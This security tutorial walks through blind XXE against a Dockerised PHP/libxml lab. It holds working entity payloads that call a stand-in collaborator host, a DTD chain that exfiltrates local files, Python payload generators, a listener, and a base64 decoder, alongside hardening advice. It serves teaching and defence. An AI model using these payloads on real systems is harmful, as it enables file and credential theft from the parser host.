Blind XXE is the variant of XML External Entity injection where the application parses the attacker's XML, never reflects any field back, and returns a flat OK regardless of what the parser found. The bug is real, the response body is silent, and the only way I prove anything is by forcing the parser to make a side-channel network request to a host I control. Against modern libxml the picture is split in two: the direct external-entity OOB probe still fires, while the textbook recursive parameter-entity DTD chain that every older write-up demonstrates does not. This article walks through both against a Dockerised lab, on the libxml that PHP 8.2 actually ships with.
TL;DR
A blind XXE endpoint parses attacker XML and returns nothing useful in the response body. To prove the bug exists I need an out-of-band channel: a host I control whose access log or DNS log captures requests the vulnerable parser issues on my behalf. Two payload shapes matter. The direct external-entity reference puts an HTTP URL in a general entity's SYSTEM value and references the entity in the document body; libxml fetches the URL while resolving the entity, my collaborator logs the GET, the bug is proven. This still fires on libxml 2.9.14 (PHP 8.2). The recursive parameter-entity chain via an external DTD, the pattern every PortSwigger walk-through uses to exfiltrate file contents through a second-stage GET, does not fire end to end on modern libxml: the DTD loads, the second-stage request never lands. Both patterns are worth knowing because plenty of production parsers are not modern libxml. Burp Collaborator and Interactsh are the listener side; the technique is identical regardless of which one I pick.
Why blind XXE matters when in-band reflection does not work
A lot of endpoints parse XML and never echo any field back. Webhook receivers, async importers, SAML metadata consumers, SOAP services with a generic "accepted" envelope, document upload pipelines that queue the parse and respond before the worker runs. The textbook in-band XXE demo, where I read /etc/passwd straight out of the HTTP response, assumes the application surfaces parsed content. Half the XXE-shaped endpoints I look at do not.
That does not mean those endpoints are safe. If the parser still dereferences external entities, the side effect of parsing is an outbound request from inside the application's network position. That side effect is the bug. A successful collaborator hit is the difference between "we suspect this parser is misconfigured" and "we have a packet that says it is", and even when file-content exfil is closed off by hardening, the OOB primitive is still a usable SSRF gadget against internal HTTP services that the attacker cannot reach directly.
The two payload shapes that matter
Direct external-entity reference (fires on libxml 2.9.14)
The minimal OOB probe. A single <!ENTITY> declaration in the inline DOCTYPE, a SYSTEM URI pointing at my collaborator, and a reference to that entity somewhere in the document body so the parser is forced to resolve it:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY exfil SYSTEM "http://collab.example/?leak=fired">
]>
<bookmarks>
<bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
When the parser walks the tree and hits &exfil;, it dereferences the SYSTEM URI to resolve the entity's substitution text. libxml issues an outbound HTTP GET to collab.example/?leak=fired. The collaborator logs the request. The application's response can be a literal OK and the bug is still proven.
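To see that mechanism without any network, here is a sketch that uses Python's stdlib SAX parser as a stand-in for libxml (it is not the lab's parser). It opts into external general entities with `feature_external_ges`, which has been off by default since Python 3.7.1, and plugs in a hypothetical `RecordingResolver` that records each SYSTEM URI instead of fetching it. The moment the resolver is called is the moment a real parser would send the GET to the collaborator.

```python
import io
import xml.sax
from xml.sax.handler import EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# The direct-entity payload, as bytes (the XML declaration must be the first thing).
PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY exfil SYSTEM "http://collab.example/?leak=fired">
]>
<bookmarks>
<bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>"""


class RecordingResolver(EntityResolver):
    """Hypothetical resolver: records every SYSTEM URI the parser wants to
    dereference and hands back canned bytes instead of opening a socket."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(b"fired"))  # stands in for the HTTP body
        return source


def probe(payload: bytes, external_ges: bool) -> list:
    """Parse the payload and return the SYSTEM URIs the parser tried to resolve."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, external_ges)
    resolver = RecordingResolver()
    parser.setEntityResolver(resolver)
    parser.parse(io.BytesIO(payload))
    return resolver.requested


if __name__ == "__main__":
    print(probe(PAYLOAD, external_ges=True))   # external entities opted in
    print(probe(PAYLOAD, external_ges=False))  # stdlib default
```

With the feature on, the resolver sees the collaborator URL; with it off, the stdlib default, the list stays empty. That is the Python analogue of the lab passing or not passing `LIBXML_NOENT`.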
What this payload does not do is exfiltrate file content. There is no way to bake /etc/passwd into the query string through a single general entity; the substitution layer that would let me do that is the parameter-entity layer in the next section, and that is where the hardening lives. Direct OOB proves the primitive and confirms egress. For SSRF gadgets that is already enough.
Recursive parameter entity in an external DTD (does not fire on libxml 2.9.14)
This is the textbook chain. Older PortSwigger labs, older write-ups, and most XXE training material build their OOB examples on this pattern, because it is the one that actually exfiltrates file content when it works.
The inline DOCTYPE loads a remote DTD via a parameter entity and forces the parameter entity to expand:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://collab.example/evil.dtd">
%remote;
]>
<bookmarks>
<bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>
The remote evil.dtd reads a local file into one parameter entity, then uses a second parameter entity to declare a third entity whose SYSTEM URI embeds the file's contents in its query string, and finally forces that third entity to resolve so the contents leave the host in a second outbound request:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://collab.example/?x=%file;'>">
%eval;
%exfil;
Against an older libxml this chain runs end to end: the DTD loads, the file is read, the second GET arrives at the collaborator with the file's contents in the URL. Against modern libxml only the first step fires. The collaborator sees GET /evil.dtd, the second request never lands, the bytes never leave.
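A small generator makes the escaping in evil.dtd explicit. The helper name `build_evil_dtd` is hypothetical. In the generated DTD, the `%` in front of the inner `exfil` name is emitted as the character reference `&#x25;`, because a bare `%` is not allowed inside an entity value. When `%eval;` is declared, the parser substitutes `%file;` and turns `&#x25;` back into `%`, so expanding `%eval;` declares the new parameter entity `%exfil;`.

```python
def build_evil_dtd(collab_base: str, target_file: str = "/etc/hostname") -> str:
    """Return the second-stage DTD for the recursive parameter-entity chain.

    collab_base is the collaborator origin, e.g. "http://collab.example".
    """
    lines = [
        # Stage 1: read the target file into the parameter entity %file;
        f'<!ENTITY % file SYSTEM "file://{target_file}">',
        # Stage 2: at declaration time %file; is substituted and &#x25; becomes '%',
        # so expanding %eval; declares a new parameter entity %exfil;
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{collab_base}/?x=%file;'>\">",
        "%eval;",
        # Stage 3: resolving %exfil; sends the second-stage GET with the file contents
        "%exfil;",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(build_evil_dtd("http://collab.example"), end="")
```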
What libxml actually changed
The full timeline lives in the parent article on XML External Entity injection. The two checkpoints that matter for blind OOB:
libxml 2.9.0 (September 2012) flipped external-entity loading off by default. Callers have to opt back in with XML_PARSE_NOENT (in C) or LIBXML_NOENT (in PHP). Every textbook XXE payload from before 2013 assumed external entities loaded by default; from 2013 onward, blind XXE requires an application that has explicitly turned the feature back on. Plenty of real production code does, usually because someone needed DTD-based validation and turned everything on rather than just LIBXML_DTDLOAD.
libxml 2.9.x parameter-entity hardening (2014 onward). The 2.9.x line tightened how parameter entities loaded from an external DTD interact with subsequent entity definitions. libxml now refuses to define a new entity inside the expansion of a parameter entity loaded from an external DTD, which is the exact mechanic the recursive chain depends on. The change rolled out incrementally across 2.9.4, 2.9.10, and the subsequent point releases. By 2.9.14 (the libxml PHP 8.2 ships), the recursive PE-DTD chain is closed.
Today's production stacks land in three buckets:
- PHP 8.2 / 8.3 and modern Python lxml on libxml 2.9.14 close the recursive chain but leave direct OOB intact.
- Java DocumentBuilder behaviour depends on the JDK and whether FEATURE_SECURE_PROCESSING is set, and many enterprise SAML and SOAP servers still have both patterns working.
- Legacy on-prem appliances and anything statically linking pre-2.9.4 libxml are fully exposed, file-content exfil and all.
Lab walkthrough
The xxe-basic lab in the techearl-labs repo ships PHP 8.2 with libxml 2.9.14 and parses incoming XML with LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA. That is the unsafe combination: LIBXML_NOENT substitutes entities, external ones included; LIBXML_DTDLOAD lets the parser load external DTDs; LIBXML_NOCDATA merges CDATA sections into text nodes. XInclude is opted into on a separate endpoint. The blind endpoint is /upload-blind.php, and it returns OK regardless of what the parser found.
Boot it:
docker compose up xxe-basic
The companion xxe-basic-collab container is a tiny Python HTTP server on the same Docker network with no published port; only the lab can reach it. It serves evil.dtd and logs every request to stdout. Tail it in a second terminal:
docker compose logs -f xxe-basic-collab
Pattern 1: direct entity OOB fires
Save the direct-entity payload to payload-direct.xml (note that the URL points at the collaborator inside the Docker network, not at a public collaborator):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
<bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
POST it to the blind endpoint:
curl -s -X POST --data-binary @payload-direct.xml \
-H 'Content-Type: application/xml' \
http://localhost:8086/upload-blind.php
The application returns OK. The collaborator log shows a line of the shape:
[collab] GET from 172.18.0.3 path=/?leak=fired
That GET is the OOB primitive firing. The parser dereferenced the external entity by issuing an outbound HTTP request to a host the attacker controls, while the application's response gave nothing away.
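The lab's collaborator script is not reproduced in this article. A minimal stand-in with the same two jobs, serving evil.dtd and printing one line per request in the log shape shown above, could look like the sketch below. `CollabHandler`, `make_server`, and the DTD body are assumptions, not the lab's code.

```python
import http.server

# Second-stage DTD, pointed at the in-network collaborator hostname.
EVIL_DTD = (
    b'<!ENTITY % file SYSTEM "file:///etc/hostname">\n'
    b"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://xxe-basic-collab/?x=%file;'>\">\n"
    b"%eval;\n"
    b"%exfil;\n"
)


class CollabHandler(http.server.BaseHTTPRequestHandler):
    hits = []  # in-memory copy of every log line, handy for scripted checks

    def do_GET(self):
        line = f"[collab] GET from {self.client_address[0]} path={self.path}"
        self.hits.append(line)
        print(line, flush=True)
        if self.path == "/evil.dtd":
            body, ctype = EVIL_DTD, "application/xml-dtd"
        else:
            body, ctype = b"ok", "text/plain"  # any other path is just a hit
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # silence the default stderr access log; the print above replaces it


def make_server(host: str = "0.0.0.0", port: int = 80) -> http.server.HTTPServer:
    return http.server.HTTPServer((host, port), CollabHandler)
```

Inside a container, `make_server().serve_forever()` would listen on port 80 of every interface; binding port 80 usually needs root, which a throwaway container typically has.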
Pattern 2: recursive PE-DTD chain does not fire
The textbook chain, saved to payload-recursive.xml:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
%remote;
]>
<bookmarks>
<bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>
The evil.dtd on the collaborator reads /etc/hostname and declares a second-stage exfil entity that embeds the content in a query string. POST it:
curl -s -X POST --data-binary @payload-recursive.xml \
-H 'Content-Type: application/xml' \
http://localhost:8086/upload-blind.php
The collaborator log shows exactly one line:
[collab] GET from 172.18.0.3 path=/evil.dtd
The DTD loaded. The second-stage GET that was supposed to carry the file contents never arrives. That gap is the libxml 2.9.x hardening at work. The same payload against libxml 2.9.3 produces a second GET with the hostname in its query string.
A clean negative on the recursive pattern does not mean "no XXE here", just "no XXE through this chain on this parser". Try the direct-entity probe first, fall back to XInclude, and only then conclude the parser is hardened.
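Because the collaborator log is the whole verdict, it helps to spell out what each outcome means. The sketch below is a hypothetical `classify_hits` helper. It assumes the `[collab] GET from ... path=...` line format shown earlier and one probe per log window.

```python
import re

LOG_LINE = re.compile(r"^\[collab\] GET from (?P<ip>\S+) path=(?P<path>\S+)$")


def classify_hits(lines, dtd_path="/evil.dtd"):
    """Map the collaborator lines seen for a single probe to a verdict."""
    paths = []
    for raw in lines:
        match = LOG_LINE.match(raw.strip())
        if match:
            paths.append(match.group("path"))
    if not paths:
        # Not proof of safety: try the direct probe, then XInclude.
        return "no hit"
    fetched_dtd = dtd_path in paths
    second_stage = [p for p in paths if p != dtd_path]
    if fetched_dtd and second_stage:
        return "recursive chain fired"
    if fetched_dtd:
        # The parser still fetched an attacker-chosen URI; only stage two was blocked.
        return "external DTD fetched, second stage blocked"
    return "direct entity fired"
```

The middle verdict is the modern-libxml result from the lab. It is still a positive finding, since the parser fetched a URI the attacker chose.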
Setting up an external collaborator
The lab uses an in-network collaborator container to keep everything offline. Against a real target you need a host whose DNS or HTTP logs you can read. The realistic options are Burp Collaborator (PortSwigger's hosted service, bundled with Burp Pro), Interactsh (ProjectDiscovery's open-source equivalent, with public servers on domains such as oast.fun and oast.live, or self-hostable on a VPS with an NS-delegated subdomain), and browser-accessible loggers like dnslog.cn, requestbin.com, or webhook.site for one-off probes. The probe pattern is identical regardless of which one you pick: put the collaborator's hostname in the SYSTEM URI of the entity, send the payload, watch the listener.
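Hosted listeners usually hand out a unique subdomain per probe, so each hit can be tied back to the request that caused it, and a DNS lookup alone registers even when outbound HTTP is blocked. Here is a sketch of doing the same by hand; `oast.example` is a placeholder for whatever domain your listener controls, and `direct_probe` is a hypothetical helper.

```python
import secrets


def direct_probe(collab_domain: str) -> tuple[str, str]:
    """Return (token, payload) for a direct-entity probe with a per-probe token.

    The token is 16 lowercase hex characters, a valid DNS label. It goes into the
    hostname (visible in DNS logs) and the query string (visible in HTTP logs).
    """
    token = secrets.token_hex(8)
    url = f"http://{token}.{collab_domain}/?leak={token}"
    payload = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY exfil SYSTEM "{url}">\n'
        "]>\n"
        "<bookmarks>\n"
        "<bookmark><name>&exfil;</name><url>http://x</url></bookmark>\n"
        "</bookmarks>\n"
    )
    return token, payload
```

Keeping a note of which token went to which endpoint turns a stray hit hours later into an attributable finding.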
What you can exfiltrate
The direct-entity primitive on a modern libxml proves the parser is misconfigured, confirms outbound HTTP egress (the same primitive that powers cloud-metadata SSRF), and surfaces anything the application added to the outbound request that you did not write yourself, such as a templated Host header or a customer ID appended to the path.
The recursive PE-DTD chain, when it works against older parsers or badly-configured Java SAML, gives you file contents via file:///etc/passwd, file:///etc/hostname, the application's own config files, and environment variables through file:///proc/self/environ on Linux. The environ read is where credentials leak: cloud keys, database passwords, signing secrets, whatever the application read at startup. On Java parsers that allow it, the jar: and netdoc: URL schemes extend the reach further. On PHP with stream wrappers enabled, php://filter/convert.base64-encode/resource=<path> sidesteps character-set problems with binary files by base64-encoding the content before it goes into the URL.
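When the chain does work, the file content has to survive being pasted into a URL: `<`, `&`, `%`, whitespace, or non-UTF-8 bytes can break the request or the DTD itself. On PHP the usual workaround is to point `%file;` at `php://filter/convert.base64-encode/resource=/etc/passwd` instead of `file:///etc/passwd`, so the collaborator receives base64. Here is a hypothetical decoder for the logged path. It assumes the value arrives in an `x` query parameter, as in the evil.dtd example, and that the listener logs the raw request path.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil(path: str, param: str = "x") -> bytes:
    """Recover file bytes from a logged request path such as '/?x=cm9vdDp4...'."""
    value = parse_qs(urlsplit(path).query)[param][0]
    # parse_qs decodes '+' to a space, but '+' belongs to the base64 alphabet.
    value = value.replace(" ", "+")
    # Restore '=' padding in case something along the way trimmed it.
    value += "=" * (-len(value) % 4)
    return base64.b64decode(value)
```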
The fix
The defence is the same as for the parent class, repeated here so this article stands on its own:
- Disable external entity resolution on every XML parser that touches untrusted input. In PHP, do not pass LIBXML_NOENT and do not pass LIBXML_DTDLOAD to loadXML. The defaults since libxml 2.9.0 are correct.
- In Java, set XMLConstants.FEATURE_SECURE_PROCESSING on every DocumentBuilderFactory, SAXParserFactory, XMLInputFactory, and TransformerFactory, plus the disallow-doctype-decl, external-general-entities, external-parameter-entities, and load-external-dtd features set to the safe values. The OWASP XXE Prevention Cheat Sheet has the full list.
- In .NET, use XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null }.
- In Python, use defusedxml for stdlib parsers, and configure lxml with XMLParser(resolve_entities=False, no_network=True, load_dtd=False).
- Prefer JSON for new APIs. JSON parsers have no entity-resolution layer; the class is closed off by construction.
- Default-deny outbound HTTP and outbound DNS at the application VPC layer. No egress means no OOB. The detection signal that catches blind SSRF (alerting on outbound DNS queries to unusual TLDs from services that have no business resolving external domains) catches blind XXE for the same reasons. See the detection notes in blind SSRF.
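For stdlib Python the maintained answer is defusedxml. The idea behind Java's disallow-doctype-decl can also be sketched directly on the stdlib expat binding: refuse any document that declares a DOCTYPE at all, which removes every entity and DTD trick in one move. `parse_untrusted` and `DoctypeForbidden` are hypothetical names. This is an illustration of the principle, not a substitute for defusedxml.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted(data: bytes) -> list:
    """Parse data with expat, rejecting any DOCTYPE; return the element names seen."""
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at <!DOCTYPE ...>, before any entity declaration is processed.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    elements = []
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(data, True)  # the handler's exception propagates out of Parse
    return elements
```

Ordinary documents parse as before; the direct-entity and recursive PE payloads both fail at the DOCTYPE, before any entity is declared.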
Real-world incidents
XXE-OOB has a long CVE history. Three that are worth knowing:
- CVE-2018-8033 in Apache OFBiz. The SOAPEventHandler (and the related XML-RPC surface) parsed user-supplied XML with external entities enabled, giving an unauthenticated attacker the direct external-entity OOB primitive against any internet-exposed OFBiz instance before 16.11.04. The pattern repeats across Java middleware wherever an XML-RPC or SOAP endpoint has not been touched since the parser defaults were unsafe.
- The 2014 Facebook XXE reported by Reginaldo Silva (writeup). The canonical OOB-XXE-to-RCE escalation: Silva used PHP's expect:// stream wrapper to turn an XXE primitive into a shell on Facebook's parser host. The OOB confirmation was the first signal; the wrapper was the escalation. The lesson Facebook's payout encoded is that an XXE finding is never just "information disclosure", because the primitive composes with whatever stream wrappers the parser supports.
- Mid-2010s enterprise XXE drip. Confluence, Jenkins, various Atlassian and Cisco products filed a steady run of XXE CVEs whose XML parsers were configured in 2010 and never revisited. Most were OOB-confirmed in disclosure write-ups even when the public fix notes describe the impact as "information disclosure". The takeaway: XXE rarely appears in greenfield code, frequently survives in legacy SOAP and SAML endpoints, and the OOB primitive is usually the first signal that something is wrong.
Where to go next
The parent article on XML External Entity injection covers the in-band file-read variant, XInclude (the entirely separate code path that bypasses entity-based defences), billion-laughs DoS, and the per-language hardening for Java, .NET, Python, and Go. The sibling variant on blind SSRF covers the OOB primitives and the detection layer in more depth, including the random-subdomain DNS detection signal that catches both classes. The hub page is the web application security vulnerabilities taxonomy.
Sources
Authoritative references this article was fact-checked against.
- PortSwigger, Blind XXE (portswigger.net)
- ProjectDiscovery, Interactsh (github.com)
- libxml2 releases (gitlab.gnome.org)





